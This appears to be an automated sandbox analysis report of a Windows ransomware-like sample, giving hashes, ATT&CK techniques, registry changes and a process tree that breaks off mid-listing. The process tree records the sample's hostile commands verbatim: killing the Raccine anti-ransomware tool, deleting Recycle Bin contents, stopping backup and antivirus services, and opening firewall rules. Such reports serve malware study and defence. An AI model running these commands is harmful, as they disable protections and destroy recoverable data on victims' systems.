1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
77s
max time network
118s
platform
windows7_x64
resource
win7v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Size

368KB
MD5

2a6f56addd8adcbb1a6cc8e1d6090012
SHA1

03227744a280d56267cbef448f7e54a924f46173
SHA256

1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554
SHA512

63d951d531ac8c9be311a73ab3c70f3b0afe77a71bbc949ede5564bc98de523bc324c926cb9d4a49dd25171f62333e645e4a56d9e2b4cceab3976672a4eba2c0

Score

10^/10

discovery evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2500	icacls.exe
2676	icacls.exe
2184	icacls.exe
5696	icacls.exe

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание внимание внимание!!!"	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Нужна помощь наших специалистов?\r\n\r\nНапишите на почту - [email protected]\r\n\r\nВас обязательно проконсультируют и помогут Вам."	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Discovers systems in the same network 1 TTPs 1 IoCs

discovery

Remote System Discovery

T1018

pid	Process
4572	net.exe

Kills process with taskkill 57 IoCs

evasion

pid	Process
3988	taskkill.exe
3724	taskkill.exe
4052	taskkill.exe
4004	taskkill.exe
3844	taskkill.exe
3700	taskkill.exe
3676	taskkill.exe
3628	taskkill.exe
4092	taskkill.exe
3996	taskkill.exe
3964	taskkill.exe
3812	taskkill.exe
3796	taskkill.exe
3772	taskkill.exe
4012	taskkill.exe
4060	taskkill.exe
3804	taskkill.exe
3932	taskkill.exe
3660	taskkill.exe
3940	taskkill.exe
3924	taskkill.exe
3740	taskkill.exe
3636	taskkill.exe
3948	taskkill.exe
4076	taskkill.exe
3780	taskkill.exe
3708	taskkill.exe
3620	taskkill.exe
3900	taskkill.exe
3860	taskkill.exe
3644	taskkill.exe
3668	taskkill.exe
2836	taskkill.exe
3764	taskkill.exe
2828	taskkill.exe
4044	taskkill.exe
4028	taskkill.exe
3972	taskkill.exe
3884	taskkill.exe
3828	taskkill.exe
1884	taskkill.exe
3820	taskkill.exe
3956	taskkill.exe
4084	taskkill.exe
3980	taskkill.exe
3876	taskkill.exe
3868	taskkill.exe
3732	taskkill.exe
3892	taskkill.exe
4036	taskkill.exe
3756	taskkill.exe
3748	taskkill.exe
3684	taskkill.exe
2852	taskkill.exe
2884	taskkill.exe
2620	taskkill.exe
2060	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
740	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 61 IoCs

description	pid	Process
Token: SeDebugPrivilege	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeDebugPrivilege	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Token: SeDebugPrivilege	1884	taskkill.exe
Token: SeDebugPrivilege	3932	taskkill.exe
Token: SeDebugPrivilege	3884	taskkill.exe
Token: SeDebugPrivilege	3900	taskkill.exe
Token: SeDebugPrivilege	3708	taskkill.exe
Token: SeDebugPrivilege	3964	taskkill.exe
Token: SeDebugPrivilege	3892	taskkill.exe
Token: SeDebugPrivilege	3636	taskkill.exe
Token: SeDebugPrivilege	3764	taskkill.exe
Token: SeDebugPrivilege	3740	taskkill.exe
Token: SeDebugPrivilege	576	powershell.exe
Token: SeDebugPrivilege	3620	taskkill.exe
Token: SeDebugPrivilege	3668	taskkill.exe
Token: SeDebugPrivilege	3820	taskkill.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeDebugPrivilege	3676	taskkill.exe
Token: SeDebugPrivilege	3748	taskkill.exe
Token: SeDebugPrivilege	3780	taskkill.exe
Token: SeDebugPrivilege	3772	taskkill.exe
Token: SeDebugPrivilege	3628	taskkill.exe
Token: SeDebugPrivilege	4052	taskkill.exe
Token: SeDebugPrivilege	3756	taskkill.exe
Token: SeDebugPrivilege	3988	taskkill.exe
Token: SeDebugPrivilege	2836	taskkill.exe
Token: SeDebugPrivilege	4028	taskkill.exe
Token: SeDebugPrivilege	3980	taskkill.exe
Token: SeDebugPrivilege	3996	taskkill.exe
Token: SeDebugPrivilege	3700	taskkill.exe
Token: SeDebugPrivilege	3828	taskkill.exe
Token: SeDebugPrivilege	4092	taskkill.exe
Token: SeDebugPrivilege	3732	taskkill.exe
Token: SeDebugPrivilege	3948	taskkill.exe
Token: SeDebugPrivilege	4012	taskkill.exe
Token: SeDebugPrivilege	3796	taskkill.exe
Token: SeDebugPrivilege	3860	taskkill.exe
Token: SeDebugPrivilege	4076	taskkill.exe
Token: SeDebugPrivilege	3844	taskkill.exe
Token: SeDebugPrivilege	2620	taskkill.exe
Token: SeDebugPrivilege	3684	taskkill.exe
Token: SeDebugPrivilege	4004	taskkill.exe
Token: SeDebugPrivilege	4036	taskkill.exe
Token: SeDebugPrivilege	4084	taskkill.exe
Token: SeDebugPrivilege	2852	taskkill.exe
Token: SeDebugPrivilege	3972	taskkill.exe
Token: SeDebugPrivilege	2060	taskkill.exe
Token: SeDebugPrivilege	3940	taskkill.exe
Token: SeDebugPrivilege	3868	taskkill.exe
Token: SeDebugPrivilege	3660	taskkill.exe
Token: SeDebugPrivilege	3724	taskkill.exe
Token: SeDebugPrivilege	2828	taskkill.exe
Token: SeDebugPrivilege	3924	taskkill.exe
Token: SeDebugPrivilege	3956	taskkill.exe
Token: SeDebugPrivilege	3644	taskkill.exe
Token: SeDebugPrivilege	3804	taskkill.exe
Token: SeDebugPrivilege	4060	taskkill.exe
Token: SeDebugPrivilege	2884	taskkill.exe
Token: SeDebugPrivilege	3876	taskkill.exe
Token: SeDebugPrivilege	4044	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 768 wrote to memory of 1644	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	30
PID 768 wrote to memory of 1644	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	30
PID 768 wrote to memory of 1644	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	30
PID 768 wrote to memory of 1884	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	32
PID 768 wrote to memory of 1884	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	32
PID 768 wrote to memory of 1884	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	32
PID 768 wrote to memory of 1032	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	37
PID 768 wrote to memory of 1032	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	37
PID 768 wrote to memory of 1032	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	37
PID 768 wrote to memory of 740	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	34
PID 768 wrote to memory of 740	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	34
PID 768 wrote to memory of 740	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	34
PID 768 wrote to memory of 548	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	38
PID 768 wrote to memory of 548	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	38
PID 768 wrote to memory of 548	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	38
PID 768 wrote to memory of 1068	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	40
PID 768 wrote to memory of 1068	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	40
PID 768 wrote to memory of 1068	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	40
PID 768 wrote to memory of 1952	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	42
PID 768 wrote to memory of 1952	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	42
PID 768 wrote to memory of 1952	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	42
PID 768 wrote to memory of 1740	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	43
PID 768 wrote to memory of 1740	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	43
PID 768 wrote to memory of 1740	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	43
PID 768 wrote to memory of 1752	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	47
PID 768 wrote to memory of 1752	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	47
PID 768 wrote to memory of 1752	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	47
PID 768 wrote to memory of 528	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	45
PID 768 wrote to memory of 528	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	45
PID 768 wrote to memory of 528	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	45
PID 768 wrote to memory of 828	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	49
PID 768 wrote to memory of 828	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	49
PID 768 wrote to memory of 828	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	49
PID 768 wrote to memory of 1852	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	50
PID 768 wrote to memory of 1852	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	50
PID 768 wrote to memory of 1852	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	50
PID 768 wrote to memory of 1128	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	53
PID 768 wrote to memory of 1128	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	53
PID 768 wrote to memory of 1128	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	53
PID 768 wrote to memory of 1184	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	55
PID 768 wrote to memory of 1184	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	55
PID 768 wrote to memory of 1184	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	55
PID 768 wrote to memory of 928	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	56
PID 768 wrote to memory of 928	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	56
PID 768 wrote to memory of 928	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	56
PID 768 wrote to memory of 576	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	58
PID 768 wrote to memory of 576	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	58
PID 768 wrote to memory of 576	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	58
PID 768 wrote to memory of 532	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	279
PID 768 wrote to memory of 532	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	279
PID 768 wrote to memory of 532	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	279
PID 768 wrote to memory of 112	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	64
PID 768 wrote to memory of 112	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	64
PID 768 wrote to memory of 112	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	64
PID 768 wrote to memory of 1112	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	61
PID 768 wrote to memory of 1112	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	61
PID 768 wrote to memory of 1112	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	61
PID 768 wrote to memory of 1072	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	854
PID 768 wrote to memory of 1072	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	854
PID 768 wrote to memory of 1072	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	854
PID 532 wrote to memory of 1828	532	net.exe	124
PID 532 wrote to memory of 1828	532	net.exe	124
PID 532 wrote to memory of 1828	532	net.exe	124
PID 768 wrote to memory of 580	768	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	874

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание внимание внимание!!!"	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Нужна помощь наших специалистов?\r\n\r\nНапишите на почту - [email protected]\r\n\r\nВас обязательно проконсультируют и помогут Вам."	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe

C:\Users\Admin\AppData\Local\Temp\1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe"
1⤵
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1644
- C:\Windows\system32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1884
- C:\Windows\system32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:740
- C:\Windows\system32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:1032
- C:\Windows\system32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:548
- C:\Windows\system32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:1068
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1952
- C:\Windows\system32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:1740
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:528
- C:\Windows\system32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1752
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:828
- C:\Windows\system32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:1852
- C:\Windows\system32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:1128
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:1184
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:5148
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:928
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:576
- C:\Windows\system32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:1112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:1604
- C:\Windows\system32\net.exe
  "net.exe" start FDResPub /y
  2⤵
  PID:112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start FDResPub /y
    3⤵
    PID:700
- C:\Windows\system32\net.exe
  "net.exe" start Dnscache /y
  2⤵
  PID:532
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start Dnscache /y
    3⤵
    PID:1828
- C:\Windows\system32\net.exe
  "net.exe" start SSDPSRV /y
  2⤵
  PID:1072
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start SSDPSRV /y
    3⤵
    PID:2228
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:580
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:1744
- C:\Windows\system32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:268
- C:\Windows\system32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:560
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:2292
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
      4⤵
      PID:6768
- C:\Windows\system32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:1736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:2304
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SstpSvc /y
